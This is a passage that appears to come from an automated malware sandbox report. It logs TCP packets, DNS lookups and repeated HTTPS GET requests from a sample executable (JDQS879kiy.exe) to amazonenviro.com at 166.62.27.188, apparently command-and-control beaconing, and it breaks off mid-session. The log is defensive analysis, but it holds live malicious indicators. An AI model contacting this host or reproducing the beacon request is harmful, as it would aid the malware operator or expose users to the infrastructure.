                      Jan 14, 2025 08:25:40.199820995 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:40.200237036 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:40.200251102 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.101587057 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.101779938 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.102936029 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.102941990 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.103250980 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.104490995 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.147330999 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.691513062 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.691865921 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.691971064 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.691971064 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.692009926 CET50075443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.692035913 CET44350075166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.804835081 CET50076443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.804884911 CET44350076166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.804975986 CET50076443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.807177067 CET50076443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.807209969 CET44350076166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.807270050 CET50076443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.826287985 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.826313019 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:41.826383114 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.826673985 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:41.826688051 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:42.727145910 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:42.727227926 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:42.728548050 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:42.728555918 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:42.728796959 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:42.730093956 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:42.775336027 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.321899891 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.322140932 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.322212934 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.322256088 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.322268009 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.322297096 CET50077443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.322303057 CET44350077166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.435177088 CET50078443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.435216904 CET44350078166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.435307026 CET50078443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.435457945 CET50078443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.435484886 CET44350078166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.435533047 CET50078443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.437563896 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.437577009 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:43.437649012 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.437987089 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:43.437994003 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.331065893 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.331132889 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:44.332532883 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:44.332556963 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.332961082 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.334129095 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:44.375329971 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.909476995 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.909722090 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:44.909775019 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:44.909884930 CET50079443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:25:44.909890890 CET44350079166.62.27.188192.168.2.7
                      Jan 14, 2025 08:25:45.023587942 CET50080443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.006894112 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.006937027 CET44350112166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.006984949 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.008871078 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.008964062 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.009099007 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.009423971 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.009463072 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.895807028 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.895894051 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.897092104 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.897116899 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.897372961 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.898530006 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.939332962 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473481894 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473622084 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473679066 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473723888 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473768950 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473800898 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473817110 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.586971045 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587023020 CET44350114166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.587126970 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587328911 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587361097 CET44350114166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.587414026 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.589694023 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.589782953 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.589855909 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.590190887 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.590228081 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.493315935 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.493603945 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.494839907 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.494848967 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.495101929 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.496378899 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.539330959 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083494902 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083849907 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083920002 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.083978891 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.083978891 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.084008932 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.084039927 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.196975946 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197036982 CET44350116166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.197150946 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197248936 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197376013 CET44350116166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.198388100 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.199671030 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.199727058 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.199789047 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.200068951 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.200083971 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.115240097 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.115309000 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.117048025 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.117055893 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.117307901 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.118529081 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.159327030 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.701951981 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.702120066 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.702179909 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703423977 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703437090 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.703447104 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703453064 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816391945 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816430092 CET44350118166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816513062 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816637039 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816660881 CET44350118166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816713095 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.818581104 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.818620920 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.818679094 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.819005966 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.819040060 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.712821007 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.712923050 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.714174986 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.714205980 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.714565992 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.715768099 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.759349108 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303258896 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303376913 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303438902 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303504944 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303527117 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303538084 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303544044 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.415591955 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.415642023 CET44350120166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.415718079 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.415798903 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.416121006 CET44350120166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.416189909 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418040037 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418095112 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.418195009 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418457031 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418473959 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.325861931 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.325953960 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.332365036 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.332380056 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.332745075 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.333877087 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.375341892 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921344042 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921601057 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921674967 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.921894073 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.921905994 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.036088943 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.036154032 CET44350122166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.036241055 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.044892073 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.044946909 CET44350122166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.045015097 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048132896 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048198938 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.048264980 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048715115 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048732996 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.976366043 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.976479053 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.993393898 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.993416071 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.993858099 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.997591972 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.043332100 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580615044 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580862045 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580959082 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581017971 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581037045 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.581053972 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581060886 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694535971 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694612980 CET44350124166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694700956 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694781065 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694827080 CET44350124166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694878101 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.696984053 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697038889 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.697129965 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697406054 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697418928 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.590600967 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.590785980 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.592463017 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.592477083 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.592729092 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.594616890 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.635333061 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171801090 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171889067 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171946049 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172087908 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172107935 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.172121048 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172126055 CET44350125166.62.27.188192.168.2.7
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jan 14, 2025 08:24:11.261616945 CET | 57196 | 53 | 192.168.2.7 | 1.1.1.1
                      Jan 14, 2025 08:24:17.619865894 CET | 56151 | 53 | 192.168.2.7 | 1.1.1.1
                      Jan 14, 2025 08:24:17.631828070 CET | 53 | 56151 | 1.1.1.1 | 192.168.2.7
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jan 14, 2025 08:24:11.261616945 CET | 192.168.2.7 | 1.1.1.1 | 0x548a | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                      Jan 14, 2025 08:24:17.619865894 CET | 192.168.2.7 | 1.1.1.1 | 0x92ac | Standard query (0) | amazonenviro.com | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jan 14, 2025 08:24:11.268670082 CET | 1.1.1.1 | 192.168.2.7 | 0x548a | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Jan 14, 2025 08:24:12.175918102 CET | 1.1.1.1 | 192.168.2.7 | 0xa36a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Jan 14, 2025 08:24:12.175918102 CET | 1.1.1.1 | 192.168.2.7 | 0xa36a | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Jan 14, 2025 08:24:12.175918102 CET | 1.1.1.1 | 192.168.2.7 | 0xa36a | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
                      Jan 14, 2025 08:24:17.631828070 CET | 1.1.1.1 | 192.168.2.7 | 0x92ac | No error (0) | amazonenviro.com | | 166.62.27.188 | A (IP address) | IN (0x0001) | false
                      • amazonenviro.com
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.7 | 49736 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:19 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:19 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:19 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.7 | 49753 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:20 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:21 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.7 | 49765 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:22 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:22 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.7 | 49777 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:23 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:24 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:24 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.7 | 49789 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:25 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:26 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:25 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.7 | 49801 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:27 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:27 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:27 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.7 | 49813 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:28 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:29 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:29 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.7 | 49825 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:30 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:31 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:30 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.7 | 49840 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:32 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:32 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:32 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.7 | 49853 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:24:33 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
